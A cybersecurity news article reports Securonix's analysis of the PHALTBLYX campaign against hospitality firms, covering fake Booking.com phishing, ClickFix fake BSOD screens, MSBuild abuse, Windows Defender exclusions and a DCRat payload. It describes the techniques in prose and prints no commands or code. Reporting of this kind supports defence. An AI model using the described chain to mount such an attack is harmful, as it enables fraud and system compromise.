A sophisticated malware campaign called PHALTBLYX has emerged, combining social engineering deception with advanced evasion techniques to compromise hospitality sector organizations.
The attack chain begins with phishing emails impersonating Booking.com, featuring urgent reservation cancellation alerts with large financial charges displayed in euros.
These messages direct victims to fake Booking.com websites that appear visually identical to the legitimate service, exploiting user anxiety about fraudulent transactions.
.webp "New ClickFix Attack Uses Fake Windows BSOD Screens to Trick Users into Executing Malicious Code 2")
The attack progresses through a carefully orchestrated series of stages designed to bypass traditional security controls. Once victims click the refresh button on the fake page, their browser displays a full-screen blue screen of death animation.
This simulated crash prompts users to follow on-screen instructions that involve pressing specific keyboard combinations.
Securonix analysts identified that the malware silently copies a PowerShell command to the clipboard, which victims unknowingly execute when following the displayed instructions.
.webp "New ClickFix Attack Uses Fake Windows BSOD Screens to Trick Users into Executing Malicious Code 4")
Securonix researchers noted that this click-fix social engineering method represents a critical evolution in the attack’s delivery mechanism.
The technique relies on manual user execution rather than automated processes, effectively circumventing security controls that would block script execution.
The malicious PowerShell command performs several functions, including opening the legitimate Booking.com admin page as a distraction while downloading an MSBuild project file from remote servers.
Infection mechanism
The infection mechanism leverages Microsoft’s legitimate MSBuild.exe compiler to execute the downloaded v.proj file, a technique known as living off the land.
This approach allows malware to proxy execution through trusted Windows utilities, often bypassing application whitelisting and antivirus detection.
Once executed, the malware disables Windows Defender by adding broad file extension exclusions and specific directory exclusions, ensuring subsequent payloads remain undetected.
The final payload is a customized variant of DCRat, a remote access trojan capable of extensive system compromise. The RAT establishes persistence using internet shortcut files placed in the Windows startup folder, disguised as legitimate system utilities.
.webp "New ClickFix Attack Uses Fake Windows BSOD Screens to Trick Users into Executing Malicious Code 5")
Upon connection to command and control servers, the malware collects comprehensive system information including hardware identification, operating system details, installed antivirus software, and active window titles.
The malware’s capabilities include keylogging, process injection into legitimate system binaries like aspnetcompiler.exe, and downloading additional malicious payloads.
The presence of Cyrillic language artifacts and Russian debugging strings strongly indicates Russian-speaking threat actors. Organizations should implement rigorous user awareness training regarding click-fix tactics and monitor suspicious MSBuild.exe executions originating from non-standard directories to detect and prevent similar attacks.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
